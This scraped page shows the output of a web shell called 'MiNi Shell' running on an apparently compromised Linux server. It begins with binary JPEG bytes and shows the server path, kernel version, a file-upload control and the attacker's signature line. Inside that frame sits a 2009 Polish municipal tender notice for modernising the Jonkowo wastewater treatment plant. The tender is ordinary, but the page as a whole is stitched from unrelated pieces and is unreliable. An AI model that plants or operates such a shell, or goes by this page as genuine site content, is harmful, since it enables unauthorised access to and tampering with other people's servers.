JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090902/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090902/145949-N-2009.html

<p class="kh_header"><b>Jonkowo: Rozbudowa i modernizacja oczyszczalni ścieków w Jonkowie</b><br>
<b>Numer ogłoszenia: 145949 - 2009; data zamieszczenia: 02.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jonkowo , ul. Klonowa 2, 11-042 Jonkowo, woj. warmińsko-mazurskie, tel. 0-89 512 92 32, faks 0-89 512 92 37, 512 92 32.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.jonkowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa i modernizacja oczyszczalni ścieków w Jonkowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia jest rozbudowa i modernizacja oczyszczalni ścieków komunalnych o wydajności 1200 m3)d, zaprojektowanej w technologii Membranowych Reaktorów Biologicznych (MBR) - z zastosowaniem membran podciśnieniowych. Lokalizacja inwestycji: działki nr 86)8, 86)9, 86)10, 86)58, 86)59 w miejscowości Jonkowo, gmina Jonkowo, pow. olsztyński, woj. warmińsko-mazurskie.
2.  Zakres zamówienia:
1) Zakres robót obejmuje wszystkie prace związane z budową oczyszczalni: roboty przygotowawcze, obiekty technologiczne oczyszczalni ścieków, sieci technologiczne, sieci wodociągowe i kanalizacyjne, sieci elektroenergetyczne i sterownicze, oświetlenie terenu, budowę ciągów komunikacyjnych i placów manewrowych, obiekty małej architektury i nasadzenia zieleni, stacja zlewna ścieków dowożonych. 
2) Zamówienie obejmuje wyposażenie oczyszczalni we wszystkie urządzenia technologiczne, aparaturę kontrolno-pomiarową, sprzęt bhp i p.poż. oraz inne urządzenia techniczne niezbędne do obsługi oczyszczalni i kanalizacji.
3) Proces realizacji zadania musi przebiegać bez wyłączenia z ruchu istniejącej oczyszczalni. 
4) Wykonawca przeprowadzi uruchomienie i rozruch oczyszczalni do momentu uzyskania założonego efektu ekologicznego.
5) Wykonawca w ramach niniejszego zamówienia przeprowadzi przeszkolenie pracowników ZGK (do 10 osób) w zakresie obsługi urządzeń oczyszczalni.
6) Wobec pomocy realizowania inwestycji w ramach Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego oraz Norweskiego Mechanizmu Finansowego Wykonawca wykona i postawi w miejscu realizacji inwestycji, odpowiednie tablice informacyjne (reklamowe i pamiątkowe) opisane w specyfikacji technicznej wykonania i odbioru robót budowlanych.
3.  Zamówienie zostanie w pełni zrealizowane z materiałów i urządzeń Wykonawcy.
4.  Zakres rzeczowy zamówienia określony w  ust. 2 obejmuje również:  
 - organizację placu budowy;
 - zasilanie tymczasowe budowy w energię elektryczną, wodę, ogrzewanie obiektów w okresie zimowym (do pomiaru zużycia wody należy stosować wodomierz zalegalizowany przez Główny Urząd Miar. Podłączenie do wody należy wykonać po uprzednim uzgodnieniu z Kierownikiem ZGK Jonkowo);
 - pełną obsługę geodezyjną robót w trakcie realizacji wraz z pierwszym tyczeniem oraz inwentaryzacjami powykonawczymi;
 - powykonawcze opracowania geodezyjno-kartograficzne;
 - powykonawczą dokumentację techniczną;
 - inne prace pomocnicze związane z obowiązującymi badaniami, próbami, odbiorami, pozostałymi badaniami kontrolnymi związanymi z wykonaniem zamówienia;
 - drogi tymczasowe służące do dojazdu do placu budowy, 
a w przypadku wyboru oferty wariantowej wymagane będzie ponadto wykonanie projektu zamiennego oraz aktualizacja pozwolenia na budowę.
5.  Wykonawca musi osiągnąć i utrzymać co najmniej założone parametry techniczne i ekologiczne oczyszczalni.
6.  Zamawiający wymaga od Wykonawcy udzielenia gwarancji jakości na zrealizowany przedmiot zamówienia, w tym na:
 1) wykonane roboty (materiały i robociznę) - co najmniej na okres 36 miesięcy od dnia odebrania przez Zamawiającego robót budowlanych i podpisania (bez uwag) protokołu końcowego,
 2) membrany - co najmniej na okres 24 miesięcy od dnia montażu.
7.  Szczegółowy opis przedmiotu zamówienia zawierają wchodzące w skład Specyfikacji Istotnych Warunków Zamówienia: dokumentacja projektowa              stanowiąca Część II SIWZ oraz specyfikacja techniczna wykonania i odbioru robót budowlanych - stanowiąca Część III SIWZ.
Wobec tego, że przewidziano wynagrodzenie w formie ryczałtu, przekazany wraz z dokumentacją projektową Przedmiar Robót należy traktować jedynie jako dokument informacyjny.
8.  Przedmiot zamówienia należy wykonać zgodnie z dokumentacją projektową z zastrzeżeniem postanowień rozdz. VI. Instrukcji dla Wykonawców. 
9.  W przypadku gdy w projektach budowlanych, specyfikacji technicznej wykonania i odbioru robót budowlanych lub przedmiarach robót przedmiot zamówienia jest opisany ze wskazaniem znaków towarowych (marek), patentów lub pochodzenia (producenta) to przyjmuje się, że wskazaniom takim towarzyszą wyrazy lub -równoważne-. 
10.  Zamawiający dopuszcza zastosowanie materiałów)urządzeń równoważnych   w takim zakresie i w taki sposób, aby łącznie: 		 
 - gwarantowały wykonanie robót w zgodzie z wydanym pozwoleniem budowlanym - Decyzją Nr Jon)85)2006 Starostwa Powiatowego w Olsztynie znak: IB.14.7351)Jon)96)3250,4260,4385)2006 z dnia 24 października 2006 r. (bez dokonywania w projekcie budowlanym zmian powodujących istotne odstąpienie od zatwierdzonego projektu budowlanego lub innych warunków pozwolenia na budowę i nakładających obowiązek uzyskania zmiany pozwolenia na budowę),
 - zastosowane materiały)urządzenia miały parametry techniczne nie gorsze od zaprojektowanych przy czym przyjmuje się, że wszelkie materiały i urządzenia określone w Specyfikacji Istotnych Warunków Zamówienia pochodzące od konkretnych producentów lub ze wskazaną marką albo patentem, określają minimalne parametry techniczne, jakościowe i użytkowe, jakim muszą odpowiadać materiały)urządzenia oferowane, aby spełnić wymagania stawiane przez Zamawiającego. Zużycie energii przez poszczególne oferowane urządzenia równoważne nie były wyższe niż założone w dokumentacji projektowej. 
11.  Ciężar udowodnienia, że materiał lub urządzenie jest równoważne 
w stosunku do wymogu określonego przez Zamawiającego spoczywa na 
składającym ofertę. Wykonawca, który zamierza zastosować materiały lub urządzenia równoważne obowiązany jest w ofercie:
 1) Wskazać w formularzu Wykaz kluczowych urządzeń technologicznych, które oferowane urządzenia lub)i materiały zostały zmienione (przed opisem urządzenia  oferowanego kolumna 4 wstawić określenie równoważne), 
 2) dołączyć do oferty stosowne, potwierdzone przez producenta, dokumenty określające dane techniczne co najmniej w zakresie odpowiadającym parametrom materiałów)urządzeń zaprojektowanych (np.: specyfikacje lub karty techniczne) oraz wymagane prawem certyfikaty lub inne dokumenty dopuszczające dane materiały (wyroby) lub urządzenia do użytkowania i pozwalające jednoznacznie stwierdzić, że dostarczane materiały)urządzenia są równoważne i odpowiadają określonym w SIWZ normom lub specyfikacjom technicznym. 
12.Jeżeli materiały lub)i urządzenia zaoferowane przez Wykonawcę jako równoważne nie będą równoważne do określonych w dokumentacji projektowej w świetle przedłożonych przez Wykonawcę dokumentów, oferta tego Wykonawcy zostanie odrzucona jako nie odpowiadająca treści specyfikacji istotnych warunków zamówienia.
13.  Serwis gwarancyjny i pogwarancyjny:
 1) W okresie gwarancyjnym Wykonawca zobowiązany będzie brać udział w przewidzianych przez producentów przeglądach urządzeń i membran.
 2) W okresie gwarancyjnym wymagany czas reakcji na usunięcie awarii - 24 godziny od momentu zgłoszenia. Wybrany Wykonawca zobowiązany będzie do podania formy zgłoszenia i potwierdzenia przyjęcia zgłoszenia z podaniem osób odpowiedzialnych za potwierdzenie zgłoszenia, ich numerów telefonów, faksów i poczty elektronicznej (e-mail). W przypadkach zagrażających bezpieczeństwu obiektu lub niebezpieczeństwu związanemu z ochroną środowiska wymagany czas reakcji na rozpoczęcie usuwania awarii - 4 godziny..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.25.21.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> tak.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca  przystępujący  do  przetargu  zobowiązany  jest  wnieść przed upływem terminu składania ofert  tj. do godziny 10:00 dnia 23.09.2009 r.  wadium   w  wysokości  200.000,00 zł (słownie: Dwieście tysięcy złotych).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.  W postępowaniu mogą wziąć udział Wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2, spełniają wymogi zawarte w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (jedn. tekst Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. zm.) oraz spełnią określone przez Zamawiającego (pkt. 2.1.) szczegółowe warunki udziału w postępowaniu. 
2.  Zgodnie z art. 22 ustawy, o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: 
 1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
 2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,  
 3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
 4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia;
2.1.  O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące szczegółowe warunki udziału w postępowaniu w zakresie ust. 2. pkt. 2) i 3) niniejszego rozdziału: 
 1) Wykażą, że dysponują lub będą dysponowali do wykonania zamówienia zespołem osób kadry kierowniczej z odpowiednimi uprawnieniami budowlanymi lub kwalifikacjami zawodowymi uznanymi na zasadach określonych w przepisach ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 Nr 63, poz. 394) i technicznej w tym co najmniej osobą: 
 a) Kierownika Budowy - z uprawnieniami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, posiadającego co najmniej 5 letnie doświadczenie zawodowe (liczone od uzyskania wymaganych uprawnień) w tym doświadczenie w kierowaniu robotami budowlanymi w zakresie  oczyszczalni ścieków przejawiające się w pełnieniu funkcji Kierownika Budowy co najmniej jednej budowy)rozbudowy)modernizacji oczyszczalni ścieków o przepustowości powyżej 500 m3)d, będącego czynnym członkiem właściwej izby samorządu  zawodowego;
 b) Kierownika robót budowlanych: z uprawnieniami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej, posiadającego co najmniej 5 letnie doświadczenie zawodowe (liczone od uzyskania wymaganych uprawnień) w tym doświadczenie w kierowaniu robotami budowlanymi w zakresie oczyszczalni ścieków przejawiające się w pełnieniu funkcji kierownika robót budowlanych co najmniej jednej budowy)rozbudowy)modernizacji oczyszczalni ścieków o przepustowości powyżej 500 m3)d, będącego czynnym członkiem właściwej izby samorządu  zawodowego;
 c) Kierownika robót elektrycznych: z uprawnieniami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, posiadającego co najmniej 5 letnie doświadczenie zawodowe (liczone od uzyskania wymaganych uprawnień).
 d) Osobą)osobami posiadającą)cymi znajomość technologii MBR odpowiedzialną)nymi za wdrożenie technologii, w szczególności za uruchomienie i przeprowadzenie rozruchu technologicznego oczyszczalni - z doświadczeniem w kierowaniu procesem rozruchu technologicznego co najmniej dwóch oczyszczalni ścieków o przepustowości powyżej Q max 1000 m3/dobę każda, wykorzystujących technologię MBR z zastosowaniem membran podciśnieniowych, w okresie ostatnich trzech lat kalendarzowych. 
 2) Wykażą, że w okresie ostatnich pięciu lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali z należytą starannością, co najmniej dwa zadania w zakresie budowy, przebudowy lub modernizacji oczyszczalni ścieków o przepustowości powyżej Q max 1000 m3/dobę. 
 3) Wykażą roczną sprzedaż netto (w okresie ostatnich 3 latach obrotowych a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) nie niższą niż 10.000.000,00 zł. 
 4) Posiadają zdolność kredytową lub)i własne środki finansowe w wysokości nie mniejszej niż  3.000.000,00 PLN.
 5) Posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej  na kwotę minimum  2.000.000,00 zł.

Ocena spełnienia warunków udziału w postępowaniu:
1.  Ocena spełnienia warunków udziału w postępowaniu nastąpi w oparciu o oświadczenie własne każdego z wykonawców potwierdzające spełnienie wymogów  art. 22  ust. 1 ustawy oraz na podstawie przedstawionych przez Wykonawcę pozostałych dokumentów, o których mowa w rozdz. IX Części I SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w)w warunki wykonawca spełnił.
2.  W przypadku  Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunki udziału w postępowaniu określone w niniejszym rozdziale:
 1) w ust. 2 pkt. 1 i 4  musi oddzielnie spełniać każdy z wykonawców 
 2) w ust. 2.1 pkt. 1,4 i 5 Wykonawcy mogą spełniać łącznie.   
 3) w ust. 2.1. pkt. 2 i 3 musi spełniać w pełni co najmniej jeden z Wykonawców.  
3.  Oceny spełniania warunków udziału w postępowaniu dokona powołana przez Zamawiającego komisja przetargowa, która sprawdzi, czy złożone oferty zawierają wymagane oświadczenia i dokumenty, a także czy potwierdzają one spełnienie warunków. Ocena spełnienia warunków zostanie dokonana według formuły spełnia)nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, Wykonawca biorący udział w niniejszym postępowaniu przedstawi następujące dokumenty:
 1) Oświadczenie, że wykonawca spełnia warunki udziału w postępowaniu, określone w art. 22 ust.1 ustawy Prawo zamówień publicznych - na formularzu zgodnym z załączonym do Części I SIWZ  - Załącznik Nr 5;
 2) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej - wystawiony/ne nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
 3) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków i opłat, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; 
 4) aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
 5) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy - wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
 6) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
1.1.  Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej  zamiast dokumentów, o których mowa: 
 1) w  ust. 1 pkt. 2 - 5 niniejszego rozdziału, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:  
 a) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
 b) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż  3 miesiące przed upływem terminu składania ofert ;
 c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
 2) w ust. 1 pkt. 6 niniejszego rozdziału, składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 u.p.z.p - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
 3) jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa wyżej należy zastąpić je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
2. W celu potwierdzenia opisanego warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia Wykonawca biorący udział w niniejszym postępowaniu przedstawi następujące dokumenty:
 1) wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności -  na formularzu zgodnym z załączonym do Części I SIWZ - Załącznik Nr 6;
 2) pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 1, wykonawca wskazał osoby, którymi będzie dysponował,
 3) dokumenty stwierdzające, że osoby, które będą kierowały budową i robotami budowlanymi posiadają wymagane uprawnienia do kierowania robotami objętymi zamówieniem (uprawnienia budowlane, aktualne zaświadczenie właściwej izby samorządu zawodowego).
 4) wykaz wykonanych robót budowlanych (co najmniej dwóch) w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w zakresie budowy, przebudowy lub modernizacji oczyszczalni ścieków (o przepustowości powyżej Q max 1000 m3)dobę, z podaniem ich wartości oraz daty i miejsca wykonania a także nazwy i adresu zleceniodawcy oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie - na formularzu zgodnym z załączonym do Części I SIWZ - Załącznik Nr 7.
3.  W celu potwierdzenia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, Wykonawca biorący udział w postępowaniu przedstawi następujący dokument:
 1) część sprawozdania finansowego - rachunek zysków i strat, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanej części sprawozdania, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego innych dokumentów określających obroty oraz zobowiązania i należności - za okres ostatnich trzech lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres;
 2) aktualną informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy - wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania;
 3) polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
4.  W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia [np.: konsorcjum] dokumenty określone w ust. 2 i 3 niniejszego rozdziału mogą zostać złożone przez jednego z Wykonawców lub wspólnie, pozostałe oświadczenia i dokumenty każdy z partnerów winien przedstawić w imieniu swojej firmy z tym, że oświadczenie o spełnianiu warunków udziału w postępowaniu, o którym mowa w ust. 1 pkt. 1, może złożyć lider (pełnomocnik, partner wiodący) wykonawców.  
5.  W celu potwierdzenia, że oferowane kluczowe urządzenia technologiczne odpowiadają wymaganiom Zamawiającego każdy Wykonawca zobowiązany jest wraz z ofertą złożyć:
 1) Wykaz kluczowych urządzeń technologicznych na formularzu odpowiadającym załączonemu do niniejszej Instrukcji - Załącznik Nr 8.  
 2) opisy techniczne (np.: karty techniczne, specyfikacje, charakterystyki techniczne lub inne stosowane dokumenty) zawierające dane techniczne co najmniej w zakresie odpowiadającym parametrom urządzeń zaprojektowanych wymienionym w Załączniku Nr 8 i potwierdzone przez producenta tych urządzeń.
W przypadku oferowania materiałów)urządzeń równoważnych  lub składania ofert wariantowych  Wykonawcy złożą również pozostałe dokumenty określone odpowiednio w rozdz. III lub VI Instrukcji dla Wykonawców, nie wymienione powyżej w pkt. 1 i 2..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 90</li>
<li>2 - zużycie energii elektrycznej - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://jonkowo-ug.bip-wm.pl zakładki: Zamówienia publiczne,  Ogłoszenia przetargów.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Jonkowo ul. Klonowa 2 11-042 Jonkowo, pok. nr 26 lub 19 (I piętro)..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.09.2009 godzina 10:00, miejsce: Urząd Gminy Jonkowo ul. Klonowa 2 11-042 Jonkowo, pok. nr 16 (piętro - sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com